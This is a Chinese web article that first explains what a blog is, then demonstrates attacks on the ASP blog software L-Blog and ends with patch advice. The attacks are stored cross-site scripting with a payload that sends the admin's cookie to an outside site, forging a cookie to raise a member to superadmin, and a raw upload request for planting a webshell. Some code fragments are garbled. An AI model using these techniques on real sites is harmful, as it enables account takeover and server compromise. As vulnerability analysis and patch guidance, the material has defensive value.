广告：
网页制作参考
千千学园
雨路开发频道
雨路技术文档
技术问答
编程技术

首先说说的是什么是blog（博客）？因为很多人都不知道blog是什么？就算看完了这篇文章都不明白，所以浪费一些篇幅希望编辑不要删除！谢谢
释义：
　 网络出版（web publishing）、发表和张贴（post——这个字当名词用时就是指张贴的文章）文章是个急速成长的网络活动，现在甚至出现了一个用来指称这种网络出版和发表文章的专有名词——weblog，或blog。一个blog就是一个网页，它通常是由简短且经常更新的post所构成；这些张贴的文章都按照年份和日期排列。blog的内容和目的有很大的不同，从对其他网站的超级链接和评论，有关公司、个人、构想的新闻到日记、照片、诗歌、散文，甚至科幻小说的发表或张贴都有。许多blogs是个人心中所想之事情的发表，其它blogs则是一群人基于某个特定主题或共同利益领域的集体创作。blog好象对网络传达的实时讯息。撰写这些weblog或blog的人就叫做blogger或blog writer。在网络上发表blog的构想使于1998年，但到了2000年才真正开始流行。起初，bloggers将其每天浏览网站的心得和意见记录下来，并予以公开，来给其它人参考和遵循。但随着blogging快速扩张，它的目的与最初已相去甚远。目前网络上数以千计的 bloggers发表和张贴blog的目的有很大的差异。不过，由于沟通方式比电子邮件、讨论群组更简单和容易，blog已成为家庭、公司、部门和团队之间越来越盛行的沟通工具，因为它也逐渐被应用在企业内部网络（intranet）。
　 现在在网络上使用的blog程序大致分为多用户和单用户两个版本，asp的blog程序以及版本都比较多，自然而然的就会存在着各种各样的漏洞啊！现在主流的asp blog程序有以下几种：

1.l-blog （loveyuki编写的asp+access架构），这个程序的修改以及美化版本n多
2.o-blog（叶开编写的asp+access/sql架构多用户）
3.misslong（多用户版本）
4.theanswer‘s blog（外国开源网站项目程序，代码谨慎简洁）
5.sic’s blog（l-blog的修改版本，安全性能都比原作强）
6.dlong（猪飞飞编写的程序属于比较早的blog程序，停止开发了）

我就拿l-blog程序来进行分析！看看我们的l-blog有多少问题？

一.l-blog程序漏洞.（跨站式脚本漏洞）
　使用最广的程序就会有更多的漏洞存在，我们l-blog程序也是一样啊！！首先看看的就是基本的漏洞跨站式脚本漏洞，在 member.asp/favorite.asp/bloglinks.asp页面里面发现，作者并没有为了防止跨站脚本的漏洞，所以完全没有过滤到任何的敏感字符，借此我们就可以进行cookie的盗取，以及对于blog的破坏了！
　我们就拿member.asp页面的“个人主页”栏目设置作为例子，我们发现只要输入特定恶意代码，这样子就可以拿到管理员的cookie或者进行破坏！例如：alert("test.by.h4k_b4n");在个人主页栏目的时候
screen.width-300)this.width=screen.width-300 border=0 alt=click to open in new window>

当管理员或者其他用户查看我们设定的帐号资料的时候，代码的就会启动，这样子就完成了跨展脚本的攻击了！
screen.width-300)this.width=screen.width-300 border=0 alt=click to open in new window>

在三个页面当中危害性最大的就是bloglinks.asp添加连接页面，只要在申请连接的地址输入恶意代码，就可以直接拿到管理员的 cookie了，因为每个连接都需要经过管理员的审核才可以，这样子每当管理员登陆admincp.asp管理后台的相关页面就会启动代码从而得到我们需要的cookie了！
代码如下：
document.location='http://yoursite.com/cookie.asp?'%2b.


cookie页面代码：

利用以上的代码，我们就可以很轻松的拿到管理员的cookie资料，进行进一步的入侵了。

（cookie欺骗漏洞）
　之前我们说了关于跨站式脚本漏洞的实现，如果我们拿到了cookie，可以去跑密码，因为cookie保留了管理员的密码，这样子就可以拿到前台以及后台的管理员权限了（如果你的主机或者是肉鸡超级强的话，我建议你去跑啊！要是我才不干啊！）如果密码没有跑出来哪怎么办啊？放弃啊？我们可以试试利用 cookie欺骗来得到前台管理员权限和webshell
（只针对1.08(se)以下没有打补丁的版本/修改版本）
　 首先就是利用老兵的cookies&inject browser去访问网站，这样子我们就可以拿到l-blog程序的用户cookie了，从而我们可以借用修改得到前台的管理员权限。
screen.width-300)this.width=screen.width-300 border=0 alt=click to open in new window>

利用快速注册，我们很快的就拿到了用户cookie，然后我们需要把l-blog的cookie资料进行修改，从而进行cookie欺骗。
cookie如下：（以下的cookie进过删减）
guoming（cookie保存的名称）=memlastpost=2005%2d1%2d7+21%3a24%3a21
&mempassword=e05cdd2e1ab4bf0aae6a8e02217c234c（我们帐号的密码）
&memstatus=member（我们的等级或者权限）&memname=h4k%5fb4n（用户名称）
而我们需要修改的参数就是关于我们权限的部分，首先我们把 memstatus=member修改为supadmin。但是为什么要修改为这个了？经过查看l-blog的数据库我们可以看到管理员的memstatus是supadmin。
screen.width-300)this.width=screen.width-300 border=0 alt=click to open in new window>

所以为了得到管理员的权限我们必需把member修改为supadmin，这样子我们就可以得到前台管理权限。保存好我们修改的cookie后，刷新网页我们就可以看到结果。
screen.width-300)this.width=screen.width-300 border=0 alt=click to open in new window>

而漏洞的起因我们可以看看commond.asp的代码，代码如下：
dim memname,mempassword,memstatus
memname=checkstr(request.cookies(cookiename)("memname"))
mempassword=checkstr(request.cookies(cookiename)("mempassword"))
memstatus=checkstr(request.cookies(cookiename)("memstatus"))
看memstatus是从cookies里读出来的。
l-blog登陆的时候
普通用户给request.cookies(cookiename)("memstatus")赋了member
超级管理员给request.cookies(cookiename)("memstatus")赋了supadmin
而前台的权限判断是根据memstatus的值，而memstatus的值，是从request.cookies(cookiename) ("memstatus")里读出来的，所以我们将memstatus=member改成memstatus=supadmin这样就获得了l-blog 的前台的管理员权限了。

（上传漏洞）
　如果我们拿到了管理员权限之后，我们为了要扩大控制。就必须要得到blog的webshell，在发表日志的功能模块我们可以找到上传的选项，从而就可以上传webshell，首先我们必须要拿到l-blog上传的封包信息，还有cookie这样子就可以进行提交了！
封包信息如下：
post /attachment.asp?action=upload http/1.1
cookie: aspsessionidqcrqsadr=klppkdncpkckfogjibbfoian; guoming=mempassword=e05cdd2e1ab4bf0aae6a8e02217c234c&memlastpost=2005%2d1%2d7+21%3a24%3a21&memstatus=supadmin&memname=h4k%5fb4n
-----------------------------7d53a9b5607f0
content-disposition: form-data; name="file"; filename="c:\documents and settings\administrator\my documents\xxx\1.jpg"
content-type: image/pjpeg
从上面的信息我们得到分析就是上传的页面是attachment.asp?action=upload,文件字段为name="file"，所以在使用工具的时候注意这两点进行设置，要不然弄不上去就不要说我骗人啊！我们用老兵的上传工具进行示范。
screen.width-300)this.width=screen.width-300 border=0 alt=click to open in new window>

如图，我们可以看到webshelll，已经弄上去了！哈哈哈这样子blog的漏洞就基本上完全被我们榨干了，顺便要说的是webshell上去之后会出现乱码的情况，是因为l-blog采用utf-8的编码所以出现代码乱码而已！
screen.width-300)this.width=screen.width-300 border=0 alt=click to open in new window>

只要我们把webshell修改了编码就可以完全避免这个问题的发上了！！！


漏洞的修复;
　 cookie的修复方法的原理就是将admin用户组手工删除，只给指定用户用户管理权限。
步骤：（指定用户指的是blog的管理员帐号
第一default.asp文件里，
找到sub membercenter ''用户中心 下面。
将if memstatus="supadmin" 改成 memname=指定用户
然后将后面的 elseif memstatus="admin" then
response.write(" "&s_post_new&"
") 删除；

第二blogpost.asp文件里，
开头"admin" and memstatus"supadmin" then%>
改成指定用户 then%>

第三attachment.asp文件，
将"supadmin" then%>改成
指定用户　then %>

我想大概的意思你一定明白了，
就是将memstatus="supadmin" 或者 memstatus="admin" 用 memname=指定用户　就可以了，
如果有多人用的话，就改成memname=指定用户　or memname=指定用户1 or memname=指定用户2

注意：
如果是关系的话，多用户用and连接
如果是=关系的话，多用户用or连接
这样子blog程序的cookie漏洞就已经可以避免了，而上传以及跨站式脚本攻击的漏洞官方网站以及提供了补丁下载，我在这里就不再一一解释了！

关于其他blog程序的漏洞
　 因为篇幅的问题本来还想把其他的blog程序的漏洞详细的告诉大家的，现在只好说说大概吧，剩下的blog有部分存在着暴库以及上传过滤不严等等的漏洞，希望正在使用这些blog程序的用户到这些程序的官方网站下载最新的补丁，避免blog受到攻击。
　文章到此就已经完全的结束，这篇文章不是为了让大家知道如何去攻击l-blog是希望大家在看的过程当中，要知道每个程序可能会存在着什么漏洞什么起因，从而进行修复或者引起注意。在使用程序的过程中，不但要懂得如何去利用，也需要在懂得利用的前提下去发现漏洞，去发现问题的所在。在此感谢淇淇小子以及永不放弃的帮助，文章如有错误请指出，谢谢。

（）